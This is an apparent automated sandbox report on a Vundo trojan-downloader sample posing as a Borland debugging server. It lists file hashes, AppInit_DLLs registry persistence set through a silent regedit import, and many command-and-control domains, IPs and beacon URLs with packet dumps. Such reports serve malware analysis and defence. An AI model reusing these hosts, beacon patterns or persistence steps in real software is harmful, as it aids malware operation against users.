Analysis Date2013-09-06 16:41:04
MD5f7edfe728b226acdf64318dd1c70c3f4
SHA1aa558ff432799cdb8ba9814b7a251542d72a1a1d

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 545a2b46c96b3e3e14886d53b96ca32f sha1: bee2f3078cdd9ca4e6b46e01553b5a1b447b66c4 size: 90112
Section_ASM2 md5: db8970f0ed57bdb0a322cac001244ca4 sha1: 6617d0ae98408862e2dcbe6f1705551022be9e39 size: 62464
Section.rdata md5: 5be8eeb9fca386416f85ea22499ceea0 sha1: 727790a1b349b756866dec182b860ae1ac42c56c size: 7680
Section.data md5: cf966f56f557d08c9bec69f08a983bb5 sha1: c5f9c4be81f768cc045b2cd5dff6b5b8a2aabb0c size: 5120
Section.tls md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section.rsrc md5: 0700f6ce8a5c5f57f0abb43c0bfc0e28 sha1: 013ef4a4db6e77f6a2b3b73eb17e54ab68d4b788 size: 17920
Timestamp2012-09-19 03:58:12
VersionLegalCopyright: Copyright © Borland Software Corporation 1990, 2001
InternalName: BORDBG61
FileVersion: 70.08.08.1442
CompanyName: Borland Software Corporation
ProductName: Borland Remote Debugging Server
ProductVersion: 51.00
FileDescription: Borland Remote Debugging Server
OriginalFilename: bordbg61.exe
PackerMicrosoft Visual C++ ?.?
PEhash96d5eb0902d5e1a03adc8ac7b1a6d8be8e91e4b8
AVaviraTR/Vundo.Gen8
AVmsseTrojanDownloader:Win32/Vundo.J
AVavgGeneric29.BLEL

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Process
↳ C:\WINDOWS\Explorer.EXE

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{00021494-0000-0000-C000-000000000046}\Enum\Implementing ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\NetCache\AdminPinStartTime ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{00021493-0000-0000-C000-000000000046}\Enum\Implementing ➝
NULL
RegistryHKEY_CURRENT_USER\SessionInformation\ProgramCount ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\SysTray\Services ➝
31
Creates FileC:\WINDOWS\system32\cofzsbn.dll
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Cookies\cf
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates ProcessC:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates Process
Winsock DNS91.233.89.106
Winsock DNSclickbeta.ru
Winsock DNSdenadb.com
Winsock DNSterrans.su
Winsock DNSnsknock.com
Winsock DNStryatdns.com
Winsock DNSclickclans.ru
Winsock DNSdenareclick.com
Winsock DNSgleospond.com
Winsock DNSfescheck.com
Winsock DNSinstrango.com
Winsock DNStegimode.com
Winsock DNSnetrovad.com
Winsock DNSnshouse1.com
Winsock DNSforadns.com
Winsock DNSgetavodes.com
Winsock DNSclickstano.com

Process
↳ Pid 1964

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝
C:\WINDOWS\system32\cofzsbn.dll\\x00

Network Details:

DNSgleospond.com
Type: A
91.220.35.154
DNSgetavodes.com
Type: A
91.220.35.154
DNStryatdns.com
Type: A
62.116.143.17
DNSfescheck.com
Type: A
62.116.143.17
DNSnsknock.com
Type: A
208.73.211.247
DNStegimode.com
Type: A
208.73.211.249
DNSdenadb.com
Type: A
208.73.211.246
DNSforadns.com
Type: A
208.73.211.230
DNSnshouse1.com
Type: A
208.73.211.246
DNSinstrango.com
Type: A
DNSnetrovad.com
Type: A
DNSterrans.su
Type: A
DNSclickstano.com
Type: A
DNSdenareclick.com
Type: A
DNSclickbeta.ru
Type: A
DNSclickclans.ru
Type: A
HTTP GEThttp://gleospond.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1988&av=0&vm=0&al=0&p=497&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1Y9/rRB5jFPW7wYzIn6nw6bl6RLJxnn6yPs0PWYsnkF
User-Agent:
HTTP GEThttp://getavodes.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1988&av=0&vm=0&al=0&p=497&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1Y9/rRB5jFPW7wYzIn6nw6bl6RLJxnn6y8EM+h/SVnW
User-Agent:
HTTP GEThttp://tryatdns.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1988&av=0&vm=0&al=0&p=497&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1Y9/rRB5jFPW7wYzIn6nw6bl6RLJxnn64IlkP7LMvLW
User-Agent:
HTTP GEThttp://fescheck.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1988&av=0&vm=0&al=0&p=497&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1Y9/rRB5jFPW7wYzIn6nw6bl6RLJxnn67d27jNH8aY8
User-Agent:
HTTP GEThttp://nsknock.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1988&av=0&vm=0&al=0&p=497&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1Y9/rRB5jFPW7wYzIn6nw6bl6RLJxnn6xopua09ytnp
User-Agent:
HTTP GEThttp://tegimode.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1988&av=0&vm=0&al=0&p=497&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1Y9/rRB5jFPW7wYzIn6nw6bl6RLJxnn664M+Ab/6ydt
User-Agent:
HTTP GEThttp://denadb.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1988&av=0&vm=0&al=0&p=497&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1Y9/rRB5jFPW7wYzIn6nw6bl6RLJxnn6xXd7l7ZM5Mh
User-Agent:
HTTP GEThttp://foradns.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1988&av=0&vm=0&al=0&p=497&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1Y9/rRB5jFPW7wYzIn6nw6bl6RLJxnn6/3Qp0+UDiah
User-Agent:
HTTP GEThttp://nshouse1.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1988&av=0&vm=0&al=0&p=497&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1Y9/rRB5jFPW7wYzIn6nw6bl6RLJxnn65JTzQm7e/In
User-Agent:
HTTP GEThttp://91.233.89.106/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1988&av=0&vm=0&al=0&p=497&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1Y9/rRB5jFPW7wYzIn6nw6bl6RLJxnn61BoISkTRKbb
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 91.220.35.154:80
Flows TCP192.168.1.1:1032 ➝ 91.220.35.154:80
Flows TCP192.168.1.1:1033 ➝ 62.116.143.17:80
Flows TCP192.168.1.1:1034 ➝ 62.116.143.17:80
Flows TCP192.168.1.1:1035 ➝ 208.73.211.247:80
Flows TCP192.168.1.1:1036 ➝ 208.73.211.249:80
Flows TCP192.168.1.1:1037 ➝ 208.73.211.246:80
Flows TCP192.168.1.1:1038 ➝ 208.73.211.230:80
Flows TCP192.168.1.1:1039 ➝ 208.73.211.246:80
Flows TCP192.168.1.1:1040 ➝ 91.233.89.106:80

Raw Pcap
0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 39383826   XX0000&key=1988&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d343937 266f733d 352e312e 32363030   =497&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 59392f72 5242356a 46505737   Wyg1Y9/rRB5jFPW7
0x000000b0 (00176)   77597a49 6e366e77 36626c36 524c4a78   wYzIn6nw6bl6RLJx
0x000000c0 (00192)   6e6e3679 50733050 5759736e 6b462048   nn6yPs0PWYsnkF H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2067   TTP/1.1..Host: g
0x000000e0 (00224)   6c656f73 706f6e64 2e636f6d 0d0a0d0a   leospond.com....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 39383826   XX0000&key=1988&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d343937 266f733d 352e312e 32363030   =497&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 59392f72 5242356a 46505737   Wyg1Y9/rRB5jFPW7
0x000000b0 (00176)   77597a49 6e366e77 36626c36 524c4a78   wYzIn6nw6bl6RLJx
0x000000c0 (00192)   6e6e3679 38454d2b 682f5356 6e572048   nn6y8EM+h/SVnW H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2067   TTP/1.1..Host: g
0x000000e0 (00224)   65746176 6f646573 2e636f6d 0d0a0d0a   etavodes.com....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 39383826   XX0000&key=1988&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d343937 266f733d 352e312e 32363030   =497&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 59392f72 5242356a 46505737   Wyg1Y9/rRB5jFPW7
0x000000b0 (00176)   77597a49 6e366e77 36626c36 524c4a78   wYzIn6nw6bl6RLJx
0x000000c0 (00192)   6e6e3634 496c6b50 374c4d76 4c572048   nn64IlkP7LMvLW H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2074   TTP/1.1..Host: t
0x000000e0 (00224)   72796174 646e732e 636f6d0d 0a0d0a0a   ryatdns.com.....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 39383826   XX0000&key=1988&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d343937 266f733d 352e312e 32363030   =497&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 59392f72 5242356a 46505737   Wyg1Y9/rRB5jFPW7
0x000000b0 (00176)   77597a49 6e366e77 36626c36 524c4a78   wYzIn6nw6bl6RLJx
0x000000c0 (00192)   6e6e3637 6432376a 4e483861 59382048   nn67d27jNH8aY8 H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2066   TTP/1.1..Host: f
0x000000e0 (00224)   65736368 65636b2e 636f6d0d 0a0d0a0a   escheck.com.....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 39383826   XX0000&key=1988&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d343937 266f733d 352e312e 32363030   =497&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 59392f72 5242356a 46505737   Wyg1Y9/rRB5jFPW7
0x000000b0 (00176)   77597a49 6e366e77 36626c36 524c4a78   wYzIn6nw6bl6RLJx
0x000000c0 (00192)   6e6e3678 6f707561 30397974 6e702048   nn6xopua09ytnp H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a206e   TTP/1.1..Host: n
0x000000e0 (00224)   736b6e6f 636b2e63 6f6d0d0a 0d0a0a0a   sknock.com......
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 39383826   XX0000&key=1988&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d343937 266f733d 352e312e 32363030   =497&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 59392f72 5242356a 46505737   Wyg1Y9/rRB5jFPW7
0x000000b0 (00176)   77597a49 6e366e77 36626c36 524c4a78   wYzIn6nw6bl6RLJx
0x000000c0 (00192)   6e6e3636 344d2b41 622f3679 64742048   nn664M+Ab/6ydt H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2074   TTP/1.1..Host: t
0x000000e0 (00224)   6567696d 6f64652e 636f6d0d 0a0d0a0a   egimode.com.....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 39383826   XX0000&key=1988&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d343937 266f733d 352e312e 32363030   =497&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 59392f72 5242356a 46505737   Wyg1Y9/rRB5jFPW7
0x000000b0 (00176)   77597a49 6e366e77 36626c36 524c4a78   wYzIn6nw6bl6RLJx
0x000000c0 (00192)   6e6e3678 5864376c 375a4d35 4d682048   nn6xXd7l7ZM5Mh H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2064   TTP/1.1..Host: d
0x000000e0 (00224)   656e6164 622e636f 6d0d0a0d 0a0d0a0a   enadb.com.......
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 39383826   XX0000&key=1988&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d343937 266f733d 352e312e 32363030   =497&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 59392f72 5242356a 46505737   Wyg1Y9/rRB5jFPW7
0x000000b0 (00176)   77597a49 6e366e77 36626c36 524c4a78   wYzIn6nw6bl6RLJx
0x000000c0 (00192)   6e6e362f 33517030 2b554469 61682048   nn6/3Qp0+UDiah H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2066   TTP/1.1..Host: f
0x000000e0 (00224)   6f726164 6e732e63 6f6d0d0a 0d0a0a0a   oradns.com......
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 39383826   XX0000&key=1988&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d343937 266f733d 352e312e 32363030   =497&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 59392f72 5242356a 46505737   Wyg1Y9/rRB5jFPW7
0x000000b0 (00176)   77597a49 6e366e77 36626c36 524c4a78   wYzIn6nw6bl6RLJx
0x000000c0 (00192)   6e6e3635 4a547a51 6d37652f 496e2048   nn65JTzQm7e/In H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a206e   TTP/1.1..Host: n
0x000000e0 (00224)   73686f75 7365312e 636f6d0d 0a0d0a0a   shouse1.com.....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 39383826   XX0000&key=1988&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d343937 266f733d 352e312e 32363030   =497&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 59392f72 5242356a 46505737   Wyg1Y9/rRB5jFPW7
0x000000b0 (00176)   77597a49 6e366e77 36626c36 524c4a78   wYzIn6nw6bl6RLJx
0x000000c0 (00192)   6e6e3631 426f4953 6b54524b 62622048   nn61BoISkTRKbb H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2039   TTP/1.1..Host: 9
0x000000e0 (00224)   312e3233 332e3839 2e313036 0d0a0d0a   1.233.89.106....
0x000000f0 (00240)                                         


Strings